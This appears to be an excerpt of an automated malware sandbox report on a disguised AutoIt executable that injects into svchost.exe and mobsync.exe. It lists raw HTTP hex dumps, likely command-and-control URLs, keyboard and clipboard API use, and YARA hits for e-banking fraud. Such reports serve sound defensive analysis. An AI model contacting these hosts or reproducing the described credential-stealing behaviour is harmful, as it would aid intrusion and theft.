68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:22 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:24 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:27 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: mobsync.exe, 00000005.00000002.3904399243.0000000004EA6000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003416000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3905763155.0000000005333000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightvision.website
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3905763155.0000000005333000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightvision.website/gn26/
                Source: mobsync.exe, 00000005.00000002.3906187965.0000000007290000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.00000000051CA000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.000000000373A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/g3h7/?sVC8z=dyqW
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000035A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY
                Source: mobsync.exe, 00000005.00000002.3904399243.000000000535C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000038CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000005.00000002.3904399243.0000000005680000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003BF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033D
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033r
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000005.00000003.2461065486.0000000007518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: mobsync.exe, 00000005.00000002.3904399243.0000000005812000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003D82000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00656B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00656B0C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00656D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00656D07
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00656B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00656B0C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00642B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00642B37
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0066F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0066F7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: This is a third-party compiled AutoIt script.0_2_00603D19
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000000.2037258561.00000000006AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0a5d4e87-d
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000000.2037258561.00000000006AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: cSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cbd7272c-a
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_17fbe505-5
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_afaeb87a-b
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
